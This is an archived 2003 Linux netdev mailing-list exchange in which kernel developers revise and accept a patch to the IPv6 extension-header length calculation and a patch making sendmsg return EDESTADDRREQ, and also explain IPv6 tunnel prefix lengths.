62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit X-archive-position: 3924 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030711.091814.128467921.yoshfuji@linux-ipv6.org> (at Fri, 11 Jul 2003 09:18:14 +0900 (JST)), YOSHIFUJI Hideaki / $B5HF#1QL@(B says: 
> D: fix offset of payload with extension header. > D: based on patch from Thomas Graf Oops, thas wrong again; please use this instead... Index: linux-2.5/net/ipv6/ip6_output.c =================================================================== RCS file: /home/cvs/linux-2.5/net/ipv6/ip6_output.c,v retrieving revision 1.33 diff -u -r1.33 ip6_output.c --- linux-2.5/net/ipv6/ip6_output.c 9 Jul 2003 05:55:17 -0000 1.33 +++ linux-2.5/net/ipv6/ip6_output.c 10 Jul 2003 23:02:56 -0000 @@ -1247,11 +1247,9 @@ inet->cork.length = 0; inet->sndmsg_page = NULL; inet->sndmsg_off = 0; - if ((exthdrlen = rt->u.dst.header_len) != 0) { - length += exthdrlen; - transhdrlen += exthdrlen; - } - exthdrlen += opt ? opt->opt_flen : 0; + exthdrlen = rt->u.dst.header_len + (opt ? opt->opt_flen : 0); + length += exthdrlen; + transhdrlen += exthdrlen; } else { rt = np->cork.rt; if (inet->cork.flags & IPCORK_OPT) -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From davem@redhat.com Thu Jul 10 17:27:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:27:29 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0RK2x028873 for ; Thu, 10 Jul 2003 17:27:21 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id RAA28070; Thu, 10 Jul 2003 17:18:33 -0700 Date: Thu, 10 Jul 2003 17:18:33 -0700 (PDT) Message-Id: <20030710.171833.34738924.davem@redhat.com> To: yoshfuji@linux-ipv6.org Cc: tgraf@suug.ch, jmorris@intercode.com.au, netdev@oss.sgi.com Subject: Re: [PATCH] IPV6: fix data offset calculation when pushing frag options {dst1opts|auth} From: "David S. 
Miller" In-Reply-To: <20030711.092435.64560380.yoshfuji@linux-ipv6.org> References: <20030710234449.GB30577@rei.rakuen> <20030711.091814.128467921.yoshfuji@linux-ipv6.org> <20030711.092435.64560380.yoshfuji@linux-ipv6.org> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit X-archive-position: 3925 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: YOSHIFUJI Hideaki / $B5HF#1QL@(B Date: Fri, 11 Jul 2003 09:24:35 +0900 (JST) In article <20030711.091814.128467921.yoshfuji@linux-ipv6.org> (at Fri, 11 Jul 2003 09:18:14 +0900 (JST)), YOSHIFUJI Hideaki / $B5HF#1QL@(B says: > D: fix offset of payload with extension header. > D: based on patch from Thomas Graf Oops, thas wrong again; please use this instead... Applied, thanks. From tgr@reeler.org Thu Jul 10 17:27:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:27:40 -0700 (PDT) Received: from rei.rakuen (dclient217-162-65-211.hispeed.ch [217.162.65.211]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0RX2x028879 for ; Thu, 10 Jul 2003 17:27:34 -0700 Received: by reeler.org id 19alkn-0000KQ-00 ; Fri, 11 Jul 2003 02:27:13 +0200 Date: Fri, 11 Jul 2003 02:27:13 +0200 From: Thomas Graf To: "YOSHIFUJI Hideaki / ?$B5HF#1QL@" Cc: davem@redhat.com, jmorris@intercode.com.au, netdev@oss.sgi.com Subject: Re: [PATCH] IPV6: fix data offset calculation when pushing frag options {dst1opts|auth} Message-ID: <20030711002713.GC30577@rei.rakuen> References: <20030710234449.GB30577@rei.rakuen> <20030711.091814.128467921.yoshfuji@linux-ipv6.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030711.091814.128467921.yoshfuji@linux-ipv6.org> X-Encryption: "Encrypted with ROT13 using key 42" 
X-archive-position: 3926 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tgraf@suug.ch Precedence: bulk X-list: netdev * yoshfuji@linux-ipv6.org wrote: > + exthdrlen += rt->u.dst.header_len + (opt ? opt->opt_flen : 0); exthdrlen is uninitialized. New patch: Index: net/ipv6/ip6_output.c =================================================================== RCS file: /cvs/tgr/linux-25/net/ipv6/ip6_output.c,v retrieving revision 1.1.1.2 diff -u -r1.1.1.2 ip6_output.c --- net/ipv6/ip6_output.c 10 Jul 2003 22:58:50 -0000 1.1.1.2 +++ net/ipv6/ip6_output.c 10 Jul 2003 23:36:48 -0000 @@ -1247,11 +1247,9 @@ inet->cork.length = 0; inet->sndmsg_page = NULL; inet->sndmsg_off = 0; - if ((exthdrlen = rt->u.dst.header_len) != 0) { - length += exthdrlen; - transhdrlen += exthdrlen; - } - exthdrlen += opt ? opt->opt_flen : 0; + exthdrlen = rt->u.dst.header_len + (opt ? opt->opt_flen : 0); + length += exthdrlen; + transhdrlen += exthdrlen; } else { rt = np->cork.rt; if (inet->cork.flags & IPCORK_OPT) From davem@redhat.com Thu Jul 10 17:31:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:31:15 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0V82x029519 for ; Thu, 10 Jul 2003 17:31:09 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id RAA28108; Thu, 10 Jul 2003 17:22:33 -0700 Date: Thu, 10 Jul 2003 17:22:32 -0700 (PDT) Message-Id: <20030710.172232.02275886.davem@redhat.com> To: tgraf@suug.ch Cc: yoshfuji@linux-ipv6.org, jmorris@intercode.com.au, netdev@oss.sgi.com Subject: Re: [PATCH] IPV6: fix data offset calculation when pushing frag options {dst1opts|auth} From: "David S. 
Miller" In-Reply-To: <20030711002713.GC30577@rei.rakuen> References: <20030710234449.GB30577@rei.rakuen> <20030711.091814.128467921.yoshfuji@linux-ipv6.org> <20030711002713.GC30577@rei.rakuen> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3927 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Thomas Graf Date: Fri, 11 Jul 2003 02:27:13 +0200 * yoshfuji@linux-ipv6.org wrote: > + exthdrlen += rt->u.dst.header_len + (opt ? opt->opt_flen : 0); exthdrlen is uninitialized. Yoshfuji already fixed this, see his followup. From tgr@reeler.org Thu Jul 10 17:33:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:33:17 -0700 (PDT) Received: from rei.rakuen (dclient217-162-65-211.hispeed.ch [217.162.65.211]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0XC2x029832 for ; Thu, 10 Jul 2003 17:33:13 -0700 Received: by reeler.org id 19alqG-0000Lz-00 ; Fri, 11 Jul 2003 02:32:52 +0200 Date: Fri, 11 Jul 2003 02:32:52 +0200 From: Thomas Graf To: "David S. 
Miller" Cc: yoshfuji@linux-ipv6.org, jmorris@intercode.com.au, netdev@oss.sgi.com Subject: Re: [PATCH] IPV6: fix data offset calculation when pushing frag options {dst1opts|auth} Message-ID: <20030711003252.GD30577@rei.rakuen> References: <20030710234449.GB30577@rei.rakuen> <20030711.091814.128467921.yoshfuji@linux-ipv6.org> <20030711002713.GC30577@rei.rakuen> <20030710.172232.02275886.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030710.172232.02275886.davem@redhat.com> X-Encryption: "Encrypted with ROT13 using key 42" X-archive-position: 3928 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tgraf@suug.ch Precedence: bulk X-list: netdev * davem@redhat.com wrote: > From: Thomas Graf > Date: Fri, 11 Jul 2003 02:27:13 +0200 > > * yoshfuji@linux-ipv6.org wrote: > > + exthdrlen += rt->u.dst.header_len + (opt ? opt->opt_flen : 0); > > exthdrlen is uninitialized. > > Yoshfuji already fixed this, see his followup. 
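
The successive versions of the exthdrlen assignment in this thread differ only in parenthesization, and the reason that matters is C operator precedence: `+` binds tighter than `?:`. The following is a minimal userspace sketch, not kernel code. The function names are hypothetical, and the integer flag `have_opt` is an assumption standing in for the kernel's `opt` pointer test.

```c
/*
 * Illustration only: plain integers stand in for the kernel fields.
 * header_len plays the role of rt->u.dst.header_len,
 * have_opt/opt_flen play the role of opt and opt->opt_flen.
 */

/*
 * How the compiler reads "header_len + have_opt ? opt_flen : 0":
 * the addition is performed first and its result becomes the condition,
 * so header_len never contributes to the returned length.
 */
int exthdrlen_as_parsed(int header_len, int have_opt, int opt_flen)
{
	return (header_len + have_opt) ? opt_flen : 0;
}

/*
 * The parenthesized form used in the later patches: the conditional
 * selects the option length, which is then added to header_len.
 */
int exthdrlen_intended(int header_len, int have_opt, int opt_flen)
{
	return header_len + (have_opt ? opt_flen : 0);
}
```

With header_len = 8, have_opt = 1 and opt_flen = 24, the first function yields 24 and the second yields 32. With have_opt = 0 the first still yields 24, while the second yields 8.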
Yep, received that mail while writing the last one ;) -- thomas From yoshfuji@linux-ipv6.org Thu Jul 10 17:34:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:34:19 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0YE2x030081 for ; Thu, 10 Jul 2003 17:34:15 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6B0ZkBo008694; Fri, 11 Jul 2003 09:35:46 +0900 Date: Fri, 11 Jul 2003 09:35:46 +0900 (JST) Message-Id: <20030711.093546.12708723.yoshfuji@linux-ipv6.org> To: davem@redhat.com, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org CC: tgraf@suug.ch Subject: Re: [PATCH] make sendmsg return EDESTADDRREQ if socket is not connected and daddr was not specified From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030710233223.GA30577@rei.rakuen> References: <20030710233223.GA30577@rei.rakuen> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3929 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030710233223.GA30577@rei.rakuen> (at Fri, 11 Jul 2003 01:32:23 +0200), Thomas Graf says: > [EDESTADDRREQ] > The socket is not connection-mode and does not have its peer > address set, and no destination address was specified. 
> > fixes sendmsg in ipv{4,6}/{raw,udp} I aggeed on this, however we may want to do for whole tree at same time. How do you think, folks? --yoshfuji From yoshfuji@linux-ipv6.org Thu Jul 10 17:35:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:35:34 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0ZS2x030332 for ; Thu, 10 Jul 2003 17:35:29 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6B0b1Bo009650; Fri, 11 Jul 2003 09:37:01 +0900 Date: Fri, 11 Jul 2003 09:37:01 +0900 (JST) Message-Id: <20030711.093701.109452621.yoshfuji@linux-ipv6.org> To: davem@redhat.com, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Cc: tgraf@suug.ch Subject: Re: [PATCH] make sendmsg return EDESTADDRREQ if socket is not connected and daddr was not specified From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030711.093546.12708723.yoshfuji@linux-ipv6.org> References: <20030710233223.GA30577@rei.rakuen> <20030711.093546.12708723.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit X-archive-position: 3930 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030711.093546.12708723.yoshfuji@linux-ipv6.org> (at Fri, 11 Jul 2003 09:35:46 +0900 (JST)), YOSHIFUJI Hideaki / 
$B5HF#1QL@(B says: > In article <20030710233223.GA30577@rei.rakuen> (at Fri, 11 Jul 2003 01:32:23 +0200), Thomas Graf says: > > > [EDESTADDRREQ] > > The socket is not connection-mode and does not have its peer > > address set, and no destination address was specified. > > > > fixes sendmsg in ipv{4,6}/{raw,udp} > > I aggeed on this, however we may want to do for whole tree at same time. ~~~~~~agreed > How do you think, folks? --yoshfuji From davem@redhat.com Thu Jul 10 17:37:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:37:56 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0br2x030770 for ; Thu, 10 Jul 2003 17:37:54 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id RAA28164; Thu, 10 Jul 2003 17:29:23 -0700 Date: Thu, 10 Jul 2003 17:29:23 -0700 (PDT) Message-Id: <20030710.172923.27804984.davem@redhat.com> To: yoshfuji@linux-ipv6.org Cc: netdev@oss.sgi.com, tgraf@suug.ch Subject: Re: [PATCH] make sendmsg return EDESTADDRREQ if socket is not connected and daddr was not specified From: "David S. Miller" In-Reply-To: <20030711.093546.12708723.yoshfuji@linux-ipv6.org> References: <20030710233223.GA30577@rei.rakuen> <20030711.093546.12708723.yoshfuji@linux-ipv6.org> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit X-archive-position: 3931 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: YOSHIFUJI Hideaki / $B5HF#1QL@(B Date: Fri, 11 Jul 2003 09:35:46 +0900 (JST) I aggeed on this, however we may want to do for whole tree at same time. How do you think, folks? 
Sure, just send more patches relative to this one :-) From davem@redhat.com Thu Jul 10 17:38:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:38:10 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0c62x030799 for ; Thu, 10 Jul 2003 17:38:06 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id RAA28173; Thu, 10 Jul 2003 17:29:36 -0700 Date: Thu, 10 Jul 2003 17:29:35 -0700 (PDT) Message-Id: <20030710.172935.77037127.davem@redhat.com> To: tgraf@suug.ch Cc: netdev@oss.sgi.com Subject: Re: [PATCH] make sendmsg return EDESTADDRREQ if socket is not connected and daddr was not specified From: "David S. Miller" In-Reply-To: <20030710233223.GA30577@rei.rakuen> References: <20030710233223.GA30577@rei.rakuen> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3932 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Thomas Graf Date: Fri, 11 Jul 2003 01:32:23 +0200 [EDESTADDRREQ] The socket is not connection-mode and does not have its peer address set, and no destination address was specified. fixes sendmsg in ipv{4,6}/{raw,udp} Applied, thanks Thomas. 
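For readers following along, here is a minimal userspace sketch (not part of the thread) of the behaviour this patch is after: send() on a datagram socket that is neither connected nor given a destination address should fail with EDESTADDRREQ. The helper name send_without_destination is made up for this illustration, and the errno it returns is an assumption about the running kernel; a kernel without the change may report a different error.

```python
import errno
import socket


def send_without_destination(family=socket.AF_INET):
    """Call send() on an unconnected UDP socket and return the errno raised.

    Hypothetical helper for illustration only. Returns None if the call
    unexpectedly succeeds.
    """
    with socket.socket(family, socket.SOCK_DGRAM) as sock:
        try:
            # No connect() and no destination address: nothing tells the
            # kernel where this datagram should go.
            sock.send(b"ping")
        except OSError as exc:
            return exc.errno
    return None


if __name__ == "__main__":
    err = send_without_destination()
    # Print the symbolic name when the errno is known, else the raw value.
    print(errno.errorcode.get(err, err))
```

The same check can be repeated with socket.AF_INET6 to cover the ipv6 side of the patch, provided the host has IPv6 support enabled.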
From yoshfuji@linux-ipv6.org Thu Jul 10 17:40:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:40:08 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0e32x031393 for ; Thu, 10 Jul 2003 17:40:04 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6B0faBo013245; Fri, 11 Jul 2003 09:41:37 +0900 Date: Fri, 11 Jul 2003 09:41:36 +0900 (JST) Message-Id: <20030711.094136.38023048.yoshfuji@linux-ipv6.org> To: davem@redhat.com Cc: netdev@oss.sgi.com, tgraf@suug.ch Subject: Re: [PATCH] make sendmsg return EDESTADDRREQ if socket is not connected and daddr was not specified From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030710.172923.27804984.davem@redhat.com> References: <20030710233223.GA30577@rei.rakuen> <20030711.093546.12708723.yoshfuji@linux-ipv6.org> <20030710.172923.27804984.davem@redhat.com> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit X-archive-position: 3933 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030710.172923.27804984.davem@redhat.com> (at Thu, 10 Jul 2003 17:29:23 -0700 (PDT)), "David S. 
Miller" says: > From: YOSHIFUJI Hideaki / $B5HF#1QL@(B > Date: Fri, 11 Jul 2003 09:35:46 +0900 (JST) > > I aggeed on this, however we may want to do for whole tree at same time. > How do you think, folks? > > Sure, just send more patches relative to this one :-) Okay, I'll do this as much as I can do... --yoshfuji From andre@tomt.net Thu Jul 10 18:49:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 18:49:21 -0700 (PDT) Received: from mail.skjellin.no (qmailr@mail.skjellin.no [80.239.42.67]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B1nB2x032162 for ; Thu, 10 Jul 2003 18:49:13 -0700 Received: (qmail 31648 invoked by uid 1006); 11 Jul 2003 01:54:08 -0000 Received: from andre@tomt.net by ns1 by uid 1003 with qmail-scanner-1.16 (sophie: 2.14/3.69. spamassassin: 2.55. Clear:. Processed in 0.024238 secs); 11 Jul 2003 01:54:08 -0000 Received: from slask.tomt.net (HELO slurv.pasop.tomt.net) (andre@tomt.net@217.8.136.222) by mail.skjellin.no with SMTP; 11 Jul 2003 01:54:08 -0000 Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Andre Tomt To: linux-kernel@vger.kernel.org Cc: Mika Liljeberg , netdev@oss.sgi.com In-Reply-To: <1057881869.3588.10.camel@hades> References: <20030710154302.GE1722@zip.com.au> <1057854432.3588.2.camel@hades> <20030710233931.GG1722@zip.com.au> <1057881869.3588.10.camel@hades> Content-Type: text/plain; charset=ISO-8859-1 Message-Id: <1057888154.26854.324.camel@localhost> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 11 Jul 2003 03:49:14 +0200 Content-Transfer-Encoding: 8bit X-archive-position: 3934 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: andre@tomt.net Precedence: bulk X-list: netdev On fre, 2003-07-11 at 02:04, Mika Liljeberg wrote: > Well, the thing is that prefix:: is a special anycast address that > identifies a router on the link prefix::/n, where n is the prefix > length. 
You had configured a 127-bit link prefix, meaning that you had > only one valid unicast address (last bit == 1) in addition to the router > anycast address (last bit == 0). Thanks for the explanation, I've been struggling to understand what Yoshfuji tried to explain to me earlier on this topic (see "IPv6 bugs introduced in 2.4.21" - ie. my bogus bugreport), now it all makes perfect sense :-) > Normally, IPv6 networks are supposed to use 64-bit on-link prefixes but > the implementation can be written in such a way that other prefix > lengths can be configured. > > Setting your tunnel prefix to /64 is certainly the right thing to do. If you don't have anything but one /64 for example.. I guess /126's would be ok as you could rule out the anycast address? It will probably work with Linux - but is it wrong in any sense, other than "breaking" with EUI-64/autoconfiguration? -- Cheers, André Tomt andre@tomt.net From yoshfuji@linux-ipv6.org Thu Jul 10 19:02:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 19:02:33 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B22R2x032572 for ; Thu, 10 Jul 2003 19:02:28 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6B23wBo016296; Fri, 11 Jul 2003 11:03:58 +0900 Date: Fri, 11 Jul 2003 11:03:58 +0900 (JST) Message-Id: <20030711.110358.32018240.yoshfuji@linux-ipv6.org> To: andre@tomt.net Cc: linux-kernel@vger.kernel.org, mika.liljeberg@welho.com, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling broken From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <1057888154.26854.324.camel@localhost> References: <20030710233931.GG1722@zip.com.au> <1057881869.3588.10.camel@hades> <1057888154.26854.324.camel@localhost> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/
X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3935 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <1057888154.26854.324.camel@localhost> (at 11 Jul 2003 03:49:14 +0200), Andre Tomt says: > Thanks for the explanation, I've been struggling to understand what > Yoshfuji tried to explain to me earlier on this topic (see "IPv6 bugs > introduced in 2.4.21" - ie. my bogus bugreport), now it all makes > perfect sense :-) Sorry for my poor explanation... > If you don't have anything but one /64 for example.. I guess /126's > would be ok as you could rule out the anycast address? It will > probably work with Linux - but is it wrong in any sense, other than > "breaking" with EUI-64/autoconfiguration? I don't think so, but I won't recommend doing this. (I don't even assign global addresses to p-t-p interfaces at all.)
--yoshfuji From mika.liljeberg@welho.com Thu Jul 10 19:03:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 19:03:36 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B23U2x032753 for ; Thu, 10 Jul 2003 19:03:32 -0700 Received: from hades.pp.htv.fi (localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6B23wZj008552; Fri, 11 Jul 2003 05:03:58 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6B23v3B008551; Fri, 11 Jul 2003 05:03:57 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Mika Liljeberg To: Andre Tomt Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: <1057888154.26854.324.camel@localhost> References: <20030710154302.GE1722@zip.com.au> <1057854432.3588.2.camel@hades> <20030710233931.GG1722@zip.com.au> <1057881869.3588.10.camel@hades> <1057888154.26854.324.camel@localhost> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1057889037.3589.42.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 11 Jul 2003 05:03:57 +0300 X-archive-position: 3936 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Fri, 2003-07-11 at 04:49, Andre Tomt wrote: > > Setting your tunnel prefix to /64 is certainly the right thing to do. > > If you don't have anything but one /64 for example.. I guess /126's > would be ok as you could rule out the anycast address? It will > probably work with Linux - but is it wrong in any sense, other than > "breaking" with EUI-64/autoconfiguration? It doesn't really make sense to use a prefix longer than /64. The last 64 bits are generally reserved for the interface ID.
